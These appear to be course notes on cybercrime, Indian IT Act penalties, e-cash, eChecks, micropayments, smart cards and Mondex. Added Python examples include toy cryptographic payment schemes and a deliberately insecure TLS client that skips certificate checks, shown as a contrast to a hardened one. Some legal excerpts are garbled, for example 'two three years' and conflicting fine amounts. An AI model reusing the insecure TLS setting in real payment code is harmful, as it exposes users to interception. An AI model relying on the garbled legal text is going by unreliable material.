Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever without permission of the owner of the computer:

– secures access;

– downloads, copies or extracts any data, computer database or any information;

– introduces or causes to be introduced any virus or contaminant;

– disrupts or causes disruption;

– denies or causes denial of access to any person;

– provides any assistance to any person to facilitate access;

– charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A – Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

any information that is grossly offensive or has menacing character; or

any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C – Punishment for identity theft

"Whoever fraudulently or dishonestly makes use of the electronic signature, password or any other unique identification feature of any other person shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D – Punishment for cheating by personation by using computer resource

"Whoever by means of any communication device or computer resource cheats by personation shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E – Punishment for violation of privacy

"Whoever intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A – Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C – Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedule I and II have been replaced. Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment
65 | Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Customers are referred to as users who spend E-Cash.
Merchants and traders are vendors who receive E-Cash.
Regulators are defined as related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts from various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.

Authentication: Merchants will need to contact the E-Cash issuers about the purchase and the amount of E-Cash involved. The E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained in the upcoming slides.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer will endorse those tokens to the merchant for acquiring services, for which the customer will authenticate the payment for the trader.

In the third phase, the trader will approach the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank will convert the tokens into electronic funds and the same will be transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another.
Like the serial numbers on real currency notes, the E-cash numbers are unique.
It is issued by a bank and represents a specified sum of real money.
It is anonymous and reusable.

Electronic Cash Security

Complex cryptographic algorithms prevent double spending.
Anonymity is preserved unless double spending is attempted.
Serial numbers can allow tracing to prevent money laundering.
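The three stages above (account setup, purchase, authentication) and the security points just listed can be seen together in one small protocol run. The following is an added example, not code from these notes: a toy of the classic blind-signature e-cash cycle. The issuer signs a token without seeing its serial number (so the withdrawal is anonymous), the merchant can verify the token with the issuer's public key alone, and the issuer keeps a spent-serial list so a token deposited twice is refused. The RSA key built from two Mersenne primes, the SHA-256 token digest and the `Issuer`/`withdraw` names are all constructions for this example and are far too small for real money.

```python
import hashlib
import secrets
from math import gcd

# Toy issuer key. The factors are the Mersenne primes 2^31-1 and 2^61-1:
# far too small for real use, but enough to run the protocol end to end.
P = (1 << 31) - 1
Q = (1 << 61) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # issuer's private signing exponent


def token_digest(serial: bytes, value: int) -> int:
    """Hash the token fields to an integer below N; this is what gets signed."""
    h = hashlib.sha256(b"ecash|" + serial + b"|" + str(value).encode()).digest()
    return int.from_bytes(h, "big") % N


def verify_token(serial: bytes, value: int, sig: int) -> bool:
    """Anyone holding the issuer's public key (N, E) can check a token offline."""
    return pow(sig, E, N) == token_digest(serial, value)


class Issuer:
    """The bank: blind-signs withdrawals and redeems deposits exactly once."""

    def __init__(self):
        self.blinded_seen = []      # all the bank ever sees at withdrawal time
        self.spent_serials = set()  # serials already redeemed

    def blind_sign(self, blinded: int) -> int:
        self.blinded_seen.append(blinded)
        return pow(blinded, D, N)

    def deposit(self, serial: bytes, value: int, sig: int) -> bool:
        if not verify_token(serial, value, sig):
            return False            # forged or altered token
        if serial in self.spent_serials:
            return False            # double spending detected
        self.spent_serials.add(serial)
        return True


def withdraw(bank: Issuer, value: int):
    """Customer side: fresh serial, blind it, have it signed, unblind."""
    serial = secrets.token_bytes(16)
    m = token_digest(serial, value)
    while True:
        r = secrets.randbelow(N - 2) + 2    # blinding factor, coprime to N
        if gcd(r, N) == 1:
            break
    blinded = (m * pow(r, E, N)) % N
    blind_sig = bank.blind_sign(blinded)    # bank signs without seeing m
    sig = (blind_sig * pow(r, -1, N)) % N   # (m r^e)^d r^-1 = m^d
    return serial, value, sig


def run_demo() -> dict:
    bank = Issuer()
    serial, value, sig = withdraw(bank, 100)
    return {
        "valid": verify_token(serial, value, sig),
        "bank_saw_digest": token_digest(serial, value) in bank.blinded_seen,
        "first_deposit": bank.deposit(serial, value, sig),
        "second_deposit": bank.deposit(serial, value, sig),
        "altered_value": verify_token(serial, 1000, sig),
    }


if __name__ == "__main__":
    print(run_demo())
```

The spent-serial set is the whole double-spending defence here; in a deployed system it is the issuer's database and must be consulted atomically at deposit time, because two merchants redeeming the same token concurrently is exactly the race the attacker relies on.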

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as card passwords or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on safe "https" protocols, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.
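The advice above ("use SSL/TLS and https") is only as good as the client configuration that enforces it. As an added illustration (not part of the original notes), the Python below puts the weak setting beside the hardened one: a client context that skips certificate verification, which any interception proxy defeats, versus one that verifies the certificate and hostname and refuses anything below TLS 1.2, plus a URL check that rejects plain http before a connection is even attempted. The function names are my own; the `ssl` calls are standard-library ones.

```python
import ssl
from urllib.parse import urlsplit


def is_safe_payment_url(url: str) -> bool:
    """Refuse to talk to an account page unless the link is https with a host."""
    parts = urlsplit(url)
    return parts.scheme == "https" and bool(parts.hostname)


def weak_client_context() -> ssl.SSLContext:
    """The setting to avoid: no certificate or hostname check, so a
    man-in-the-middle can terminate the TLS session with any certificate."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    """Verify the server certificate against the system trust store, check
    that it matches the hostname, and refuse TLS versions below 1.2."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED + check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def describe(ctx: ssl.SSLContext) -> dict:
    """Summarise the properties a reviewer would check on a client context."""
    return {
        "verifies_cert": ctx.verify_mode == ssl.CERT_REQUIRED,
        "checks_hostname": ctx.check_hostname,
        "min_tls_1_2": ctx.minimum_version >= ssl.TLSVersion.TLSv1_2,
    }


if __name__ == "__main__":
    print("weak:    ", describe(weak_client_context()))
    print("hardened:", describe(hardened_client_context()))
    print(is_safe_payment_url("http://bank.example/account"))
```

`describe()` is the kind of check worth running in a test suite against whatever context the payment client actually uses, since a single `verify_mode = CERT_NONE` left in from debugging silently removes the protection the paragraph above relies on.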

Advantages

We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.
Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.
E-cash supports small payments. Other online payment systems charge a fee for every transaction no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

However secure the e-cash payment system is, still no one is safe against online frauds. In this case the trader is referred to as fraudulent: the trader may take the amount but may not provide the services.
While making the payment it is very important that the internet connection and power supply should be active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but it won't reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown a tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money – and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions, or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business – and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data, and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service.

1. Payer (customer/bill payer) is prompted to authorize electronic debit, enter bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards bank routing number and account number to processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. Processor forwards approve/decline results to CyberSource.
5. CyberSource returns approval/decline message to merchant.
6. If approved, CyberSource routes check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
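Two of the controls named above can be shown concretely: the routing-number validation in step 4 and the "duplicate detection" item under "Protecting your business". The following is an added example, not CyberSource's or any processor's code. The ABA routing transit number check digit is a public standard (weights 3, 7, 1 repeated across the nine digits, sum divisible by 10); the duplicate check fingerprints each scanned check by routing number, account, check number and amount, hashed so the intake log does not retain raw account numbers. The `EcheckIntake` class, its batch format and the sample scans (account numbers and check numbers are made up; the routing numbers were chosen only to pass or fail the checksum) are all constructions for this example.

```python
import hashlib
from decimal import Decimal


def valid_aba_routing(routing: str) -> bool:
    """ABA routing transit number checksum: nine digits, weighted 3,7,1,
    3,7,1,3,7,1; the weighted sum must be a multiple of 10."""
    if len(routing) != 9 or not routing.isdigit():
        return False
    weights = (3, 7, 1, 3, 7, 1, 3, 7, 1)
    total = sum(int(d) * w for d, w in zip(routing, weights))
    return total % 10 == 0


def echeck_fingerprint(routing: str, account: str, check_no: str, amount: str) -> str:
    """Stable identifier for one scanned check. Normalising the check number
    and amount means '01001'/'49.950' and '1001'/'49.95' collide, as they should."""
    canonical = f"{routing}|{account}|{int(check_no)}|{Decimal(amount):.2f}"
    return hashlib.sha256(canonical.encode()).hexdigest()


class EcheckIntake:
    """Front-end control: reject bad routing numbers and re-scanned checks
    before anything is submitted to the ACH processor."""

    def __init__(self):
        self.seen = set()       # fingerprints already accepted
        self.accepted = []
        self.rejected = []      # (reason, fingerprint or None)

    def submit(self, routing: str, account: str, check_no: str, amount: str) -> str:
        if not valid_aba_routing(routing):
            self.rejected.append(("bad_routing", None))
            return "bad_routing"
        fp = echeck_fingerprint(routing, account, check_no, amount)
        if fp in self.seen:
            self.rejected.append(("duplicate", fp))
            return "duplicate"
        self.seen.add(fp)
        self.accepted.append(fp)
        return "accepted"


# Constructed sample batch: (routing, account, check number, amount).
SAMPLE_BATCH = [
    ("021000021", "123456789", "1001", "49.95"),
    ("021000021", "123456789", "1002", "12.00"),
    ("021000021", "123456789", "1001", "49.95"),   # same check scanned twice
    ("021000022", "123456789", "1003", "5.00"),    # last digit mistyped: checksum fails
]


def process_batch(batch=SAMPLE_BATCH) -> dict:
    intake = EcheckIntake()
    results = [intake.submit(*scan) for scan in batch]
    return {"results": results, "accepted": len(intake.accepted),
            "rejected": len(intake.rejected)}


if __name__ == "__main__":
    print(process_batch())
```

The checksum only catches transcription errors, not a fabricated but well-formed routing number; that is why step 4 also verifies the account's history with the processor. The duplicate set here lives in memory for one batch, whereas a real intake keeps it across batches and days, since the re-presentment the text warns about rarely happens within a single scan session.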

Four Different Scenarios of the FSTC E-check System –

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)
Paywords (post-payment)

MICRO PAYMENT IS –

Very small payments made over the Web.
Transactions too small for credit cards.
Can be as little as a fraction of a cent.
Alternative to subscription and advertising.
Can go in either direction.

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
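The post-payment method listed earlier (Paywords) is the standard way to get the "accumulate, then settle once" behaviour described above without a signature or a round trip to the provider per click. As an added example, not code from these notes, the Python below implements the hash-chain core of that scheme: the user builds a chain w_n ... w_0 with w_i = H(w_{i+1}), hands the vendor the root w_0 as a commitment, and then pays one unit per step by revealing the next element; the vendor verifies each payment by hashing forward to the last value it holds and redeems the highest index it has seen in one settlement. The signed commitment and broker certificate of the full PayWord protocol are left out, and the `Customer`/`Vendor` classes are my own construction.

```python
import hashlib
import secrets


def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def make_chain(length: int, seed: bytes = None) -> list:
    """Build [w0, w1, ..., w_n]: w_n is random, w_i = H(w_{i+1}), w0 is the root."""
    w = seed if seed is not None else secrets.token_bytes(32)
    chain = [w]
    for _ in range(length):
        w = H(w)
        chain.append(w)
    chain.reverse()          # index 0 is the commitment, index n the secret end
    return chain


class Customer:
    def __init__(self, chain_length: int):
        self.chain = make_chain(chain_length)
        self.spent = 0

    def commitment(self) -> bytes:
        return self.chain[0]

    def pay(self, units: int = 1):
        """Reveal the payword `units` steps further along the chain."""
        new_index = self.spent + units
        if new_index > len(self.chain) - 1:
            raise ValueError("chain exhausted; commit to a new chain")
        self.spent = new_index
        return self.chain[new_index], new_index


class Vendor:
    def __init__(self, commitment: bytes):
        self.last_word = commitment
        self.last_index = 0

    def accept(self, word: bytes, index: int) -> bool:
        """Valid iff hashing `word` (index - last_index) times yields last_word."""
        steps = index - self.last_index
        if steps <= 0:
            return False           # replay or out-of-order payword
        x = word
        for _ in range(steps):
            x = H(x)
        if x != self.last_word:
            return False           # not on the committed chain: forged
        self.last_word, self.last_index = word, index
        return True

    def amount_owed(self) -> int:
        return self.last_index     # settled with the provider in one claim


def run_demo() -> dict:
    customer = Customer(100)
    vendor = Vendor(customer.commitment())
    w1, i1 = customer.pay(1)
    w4, i4 = customer.pay(3)       # three units at once: one hash chain step each
    return {
        "first": vendor.accept(w1, i1),
        "batch_of_three": vendor.accept(w4, i4),
        "replay": vendor.accept(w1, i1),
        "forged": vendor.accept(secrets.token_bytes(32), 5),
        "owed": vendor.amount_owed(),
    }


if __name__ == "__main__":
    print(run_demo())
```

Security rests on the one-wayness of H: the vendor can check that a revealed value hashes to the root but cannot compute the next one itself, so it can only claim what the customer actually released, and a replayed or reordered payword is rejected because its index is not beyond the last accepted one.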

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. 4) The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) how to pay for desired content or goods.

The most common micropayment options are listed below. 6)

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and Mastercard SecureCode™).
Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

Publishing
Marketing
Software
Entertainment
Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing.[2] Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized, with a microchip embedded on it.
Two types:
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes.
Newer smart cards have math co-processors.
Perform complex encryption routines quickly.
In 1968 German inventors patented the combination of plastic cards with micro chips.

Construction of Smart Cards –


Why Smart Cards –

Improve the convenience and security of any transaction.
Provide tamper-proof storage of user and account identity.
Provide vital components of system security.
Protect against a full range of security threats.

Advantages –

Flexibility
Security
Portability
Increasing data storage capacity
Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications –

Ticketless travel
Seoul bus system: 4M cards, 1B transactions since 1996
Planned for the SF Bay Area system
Authentication, ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards.
Transfer of electronic money over the Internet or telephone networks, etc.
Keep transaction records.
Password protection and "lock card" functions.
Portable balance finder to check balance.
Support multiple currencies.

ADVANTAGES

CONSUMER –
Convenience
Accessibility
On-chip record of recent transactions
Home load
Internet purchases

MERCHANT –
Reliable off-line payment
Higher security
Low transaction cost
Reduced cash handling

FINANCIAL INSTITUTION –
Strengthen customer relationships
New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy –

Principles protected:
o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance

Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
